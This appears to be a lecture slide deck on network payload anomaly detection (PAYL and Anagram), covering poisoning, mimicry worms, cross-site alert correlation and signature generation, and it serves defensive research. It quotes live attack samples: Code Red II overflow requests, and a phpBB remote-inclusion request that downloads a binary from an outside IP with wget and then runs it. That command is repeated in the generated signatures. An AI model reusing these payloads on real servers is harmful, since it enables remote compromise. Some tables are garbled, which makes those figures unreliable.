- Pre-compute a bad content model using Snort rules and a collection of worm samples, to supervise the learning
  - This model should match very few normal packets, while being able to identify malicious traffic (often, new exploits reuse portions of old exploits)
  - The model contains the distinct n-grams appearing in these malcode collections
  - Use a small, clean dataset to exclude the normal n-grams appearing in the Snort rules and virus samples

Bad content model (purple part). Figure labels: n-grams in Snort rules and collected malware; n-grams in clean traffic

Distribution of bad content matching scores for normal packets (left) and attack packets (right). The “matching score” is the percentage of the n-grams of a packet that match the bad content model



Use of bad content model
- Training: ignore possibly malicious n-grams
  - Packets with a max number of n-grams matching the bad content model are ignored
  - Packets with a high matching score (>5%) are ignored, since new attacks might reuse old exploit code
  - Ignoring a few packets is harmless for training
- Testing: scoring separates malicious from normal
  - If a never-seen n-gram also appears in the bad content model, give it a higher weight factor t (t=5 in our experiment)





Feedback-based learning with shadow servers
- Training attacks: the attacker sends malicious data during training time to poison the model
  - The bad content model cannot guarantee 100% detection
  - The most reliable way is to use the feedback of a host-based shadow server to supervise the training
  - Also useful for adaptive learning to accommodate concept shifting
- PAYL/Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow server
  - Only a small percentage of the traffic is sent to the shadow server, instead of all of it
  - The feedback of the shadow server can improve the accuracy of Anagram


The structure of the mimicry worm



The maximum possible padding length for a packet of different varieties of this mimicry attack
Version, padding length: 418, 100 10 125 149 730, 10 437 730, 100 10 461 1167 730, 100 1191
Each cell in the top row contains a tuple (x, y), representing a variant sequence of y packets of x bytes each. The second row represents the maximum number of bytes that can be used for padding in each packet.

Ingress/egress experimental setting
- Launched CodeRed and CodeRed II in our controlled test environment, captured the traces, and merged them into a real web server's trace
  - Simulates a real worm attacking and propagating on a real server
- Interesting behavior observed about the worm
  - Propagation occurred with packets fragmented differently than the initial attack packets
  - Multiple types of fragmentation

Different fragmentation for CR and CRII

| Worm | Incoming | Outgoing |
|---|---|---|
| Code Red (total 4039 bytes) | 1448, 1143 | 4, 13, 362, 91, 1460, 649; 4, 375, 1460, 740; 4, 13, 453, 1460, 649 |
| Code Red II (total 3818 bytes) | 1448, 922 | 1460, 898 |



Results of correlation for different metrics
- Metric: SE, LCS (0.5), LCSeq (0.5)
- Detect propagation: No, Yes
- False alerts: No, No, No

The number in parentheses is the threshold setting for the similarity score used to decide whether a propagation has occurred

Data Diversity
Example byte distribution for payload length 536 of port 80 for the three sites.



PAYL: for each pair of sites, the 3 packet lengths with the largest Manhattan distance between their byte distributions (each cell: length, distance).

| Site pair | 1st | 2nd | 3rd |
|---|---|---|---|
| EX, W | 1448, 0.7896 | 1460, 0.7851 | 216, 0.6241 |
| EX, W1 | 1460, 0.9746 | 1448, 0.8731 | 536, 0.5540 |
| W, W1 | 892, 0.7502 | 1460, 0.7456 | 1448, 0.7122 |

Anagram: the number of unique 5-grams in datasets W, W1 and EX, and the number of common 5-grams between each pair of sites.
Dataset A, Dataset B, common 5-grams, Perc(%): EX (509347), W (953345), 129468, 17.5%; W1, EX (509347), (974292), 13.4%, W1, 99366

Testing methodology
- Three sets of traffic
  - www1 and www2: Columbia webservers, 100 packets each
  - Malicious packet dataset, 56 packets
  - Known ground truth
- Arranged into three sets of pairs
  - 10,000 “good vs. good”
  - 1,540 “bad vs. bad”
  - 5,600 “good vs. bad” between www1 and the malicious dataset
- Compare
  - Similarity of the approaches
  - Effectiveness in correlating
  - Ability to generate signatures

Similarity: direct string comparison
- Similarity score, 80 random pairs of “good vs. good”
- High-level view of score similarities
- Most of the techniques are similar, except LCS (vulnerable to slight differences)
- ED and LCSeq are very similar
- N-gram techniques are not included (they do not compute similarity over the entire packet datagram)



Similarity comparison (II)
- To compare the difference more precisely, normalize and compare scores
  - Compute similarity score vectors V_A, V_B
  - Match their medians
  - Scale ranges proportionally so min and max values match
- Manhattan distance is then computed between the vectors
- Each privacy-enabled technique is compared against Raw-LCSeq (baseline)



Similarity of packets (III)
Normalized similarity scores (lower is better), by pair type G-G, B-B, G-B:
- Raw-LCS: .0948, .0508, .0251
- Raw-ED: .0336, .0441, .0241
- MD: .0669, .0653, .0110
- ZStr-LCS and ZStr-LCSeq: .2079, .0794, .0399, .0263, .0310, .0191
- ZStr-ED: .0667, .0669, .0233

Observations:
- Unsurprisingly, Raw-ED is closest to Raw-LCSeq
- All privacy-preserving methods are close when correlating pairs including attack traffic; they may be leveraging the difference between byte distributions
- Manhattan distance between packet frequency distributions is best



Worm variants: CRII example [Crandall 05]

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\x0d\n

GET /notarealfile.idq?UOIRJVFJWPOIVNBUNIVUWIFOJIVNNZCIVIVIGJBMOMKRNVEWIFUVNVGFWERIOUNVUNWIUNFOWIFGITTOOWENVJSNVSFDVIRJGOGTNGTOWGTFGPGLKJFGOIRWTPOIREPTOEIGPOEWKFVVNKFVVSDNVFDSFNKVFKGTRPOPOGOPIRWOIRNNMSKVFPOSVODIOREOITIGTNJGTBNVNFDFKLVSPOERFROGDFGKDFGGOTDNKPRJNJIDH%u1234DSPPOITEBFBWEJFBHREWJFHFRG=bla HTTP/1.0\x0d\n

Anagram privacy-preserving cross-site collaboration
- The anomalous n-grams of a suspicious payload are stored in a Bloom filter, and exchanged among sites
- By checking the n-grams of local alerts against the Bloom filter alert, it’s easy to tell how similar the alerts are to each other
  - The common malicious n-grams can be used for general signature generation, even for polymorphic worms
- Privacy preserving with no loss of accuracy

Robust Signature Generation
- Anagram not only detects suspicious packets, it also identifies the corresponding malicious n-grams!
- These n-grams are good targets for further analysis and signature generation
- The set of n-grams is order-independent. Attack vector reordering will fail.



Anagram flattened signature for the phpBB attack

Attack content:

    GET /modules/Forums/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User-Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..

Generated signatures using different N:

    N=3: *?ph*bb_*//8*p;wg*n;c*n;./c*n;ec*0YYY;echo|H*26.U*1;).*
    N=5: *ums/ad*in/admin_sty*.phpadmin_sty*hp?phpbb_root_path=http://81.174.26.111/cmd*cmd=cd%20/tmp;wget%20216*09.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTT*6.26.Use*5.1;)..*
    N=7: *dules/Forums/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gi*?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/*59.16.26.User-*T 5.1;)..*

Note: “.” stands for nonprintable characters; “*” represents a wildcard for signature matching
